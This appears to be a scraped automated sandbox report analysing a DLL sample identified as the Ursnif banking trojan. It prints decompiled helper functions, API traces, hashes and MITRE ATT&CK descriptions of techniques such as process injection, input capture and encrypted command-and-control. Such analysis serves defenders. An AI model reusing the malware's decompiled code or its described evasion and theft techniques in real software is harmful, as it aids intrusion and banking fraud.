Opcode Fuzzy Hash: d847e650cbe3b8248d703cbbe6841f7c35e1b12e1590e48705f2faebfc279b21
Instruction Fuzzy Hash: F051D175904A608BDB308F99C5983B537B3F747310F154029ED9897388EBB94AA9DFB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1B34E8
DName::DName.LIBVCRUNTIMED ref: 6E1B34F7

Part of subcall function 6E1A9110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1A916E

Strings

A, xrefs: 6E1B34A6

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: fc398629b0b1d839c23cf9c4d422210b7e0c672a945f5b3c1fa76ccae5e089dd
Instruction ID: b12dae256f0beddef3dda5629cfa325ef3bb9068d23e282d0994bcdc1a110938
Opcode Fuzzy Hash: fc398629b0b1d839c23cf9c4d422210b7e0c672a945f5b3c1fa76ccae5e089dd
Instruction Fuzzy Hash: CB01AD74D44248BFCB02DFA8D95AAEC7BB5AB41304F14C094EA481F380C7B1AED1EB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A4020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A406E
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A4082

Strings

csm, xrefs: 6E1A4039

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction ID: 8f9f24bf8a084314653756976679167cbf19f10c1d705bc08de5406a15600c6e
Opcode Fuzzy Hash: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction Fuzzy Hash: E201ED38A00208DFCB48CFA9C2508ADBBB6BF54201B608998D5555B315DB71DF82EB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C98389, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02C98389(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02C97E20(_t2);
				if(_t34 != 0) {
					_t30 = E02C97E20(_t28);
					if(_t30 == 0) {
						E02C9A5FA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02C9A8C7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02C9A8C7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x02c98389
0x02c98393
0x02c98395
0x02c9839b
0x02c9839b
0x02c983a4
0x02c983a8
0x02c983b4
0x02c983b8
0x02c9842c
0x02c983ba
0x02c983ba
0x02c983be
0x02c983c3
0x02c983c8
0x02c983e2
0x02c983d1
0x02c983d1
0x02c983d5
0x02c983d8
0x02c983dd
0x02c983dd
0x02c983e7
0x02c9840f
0x02c98415
0x02c98418
0x02c983e9
0x02c983eb
0x02c983f3
0x02c983fe
0x02c98403
0x02c98403
0x02c9841f
0x02c98426
0x02c98427
0x02c98427
0x02c983b8
0x02c98437

APIs

lstrlen.KERNEL32(00000000,00000008,?,74784D40,?,?,02C95741,?,?,?,?,00000102,02C96187,?,?,00000000), ref: 02C98395

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

Part of subcall function 02C9A8C7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02C983C3,00000000,00000001,00000001,?,?,02C95741,?,?,?,?,00000102), ref: 02C9A8D5
Part of subcall function 02C9A8C7: StrChrA.SHLWAPI(?,0000003F,?,?,02C95741,?,?,?,?,00000102,02C96187,?,?,00000000,00000000), ref: 02C9A8DF

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02C95741,?,?,?,?,00000102,02C96187,?), ref: 02C983F3
lstrcpy.KERNEL32(00000000,00000000), ref: 02C98403
lstrcpy.KERNEL32(00000000,00000000), ref: 02C9840F

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 493b3d20771763a2b5bed6ec448302e3b8604e41e622e042d35e5d2fcfb1647f
Instruction ID: 2797712753c8119c81c13e223b9e753111e73adb71b91ef7dfaf1f2feece2dd3
Opcode Fuzzy Hash: 493b3d20771763a2b5bed6ec448302e3b8604e41e622e042d35e5d2fcfb1647f
Instruction Fuzzy Hash: 9F219D72504255FBCF12AF65C89CAAE7FA9AF57284B048155F9059B201DB34CA11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C98FE0, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C98FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02C97E20(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x02c98ff5
0x02c98ff9
0x02c99003
0x02c99008
0x02c9900d
0x02c9900f
0x02c99017
0x02c9901c
0x02c9902a
0x02c9902f
0x02c99039

APIs

lstrlenW.KERNEL32(004F0053,?,74785520,00000008,0514937C,?,02C9581A,004F0053,0514937C,?,?,?,?,?,?,02C98522), ref: 02C98FF0
lstrlenW.KERNEL32(02C9581A,?,02C9581A,004F0053,0514937C,?,?,?,?,?,?,02C98522), ref: 02C98FF7

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

memcpy.NTDLL(00000000,004F0053,747869A0,?,?,02C9581A,004F0053,0514937C,?,?,?,?,?,?,02C98522), ref: 02C99017
memcpy.NTDLL(747869A0,02C9581A,00000002,00000000,004F0053,747869A0,?,?,02C9581A,004F0053,0514937C), ref: 02C9902A

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 0cfbed03d14c5320f4dbc90d5844ed3ff514b8787d80efb219b8dccda2332fbc
Instruction ID: e5e7c41a97090373df7063c2f2fbd46c5afaf5ac64f7d1fb8b55c1adb0606fed
Opcode Fuzzy Hash: 0cfbed03d14c5320f4dbc90d5844ed3ff514b8787d80efb219b8dccda2332fbc
Instruction Fuzzy Hash: 6DF04972901118BB8F11EFA8CC88C8F7BADEF09294B018462ED08D7201E735EA14DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02C98007, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05149918,00000000,00000000,770CC740,02C92B1B,00000000), ref: 02C98017
lstrlen.KERNEL32(?), ref: 02C9801F

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

lstrcpy.KERNEL32(00000000,05149918), ref: 02C98033
lstrcat.KERNEL32(00000000,?), ref: 02C9803E

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 6c91e518dee819034b0733bfde327f5afd19cd7da8b0ae5f1de14b6f89c867d1
Instruction ID: 8ddc667b641d4cc855d1b8411480416a73e0e1fc7bb4d4135f35f34a392b789d
Opcode Fuzzy Hash: 6c91e518dee819034b0733bfde327f5afd19cd7da8b0ae5f1de14b6f89c867d1
Instruction Fuzzy Hash: 07E092739426206B8B116BE4AC4CD6BBBADFF8D651B040A17F600D3100C7248D218BE0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 609a460e94791.tiff.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 6E171237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 6E1715F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E1717FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E171F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6E171352, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Function 6E171F56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Function 6E17150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E17179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6E1710E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6E17173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6E171E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 6E171424, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 6E1710BC, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 6E171699, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 6E171CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 6E1723A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 6E172184, Relevance: .1, Instructions: 77
COMMONCrypto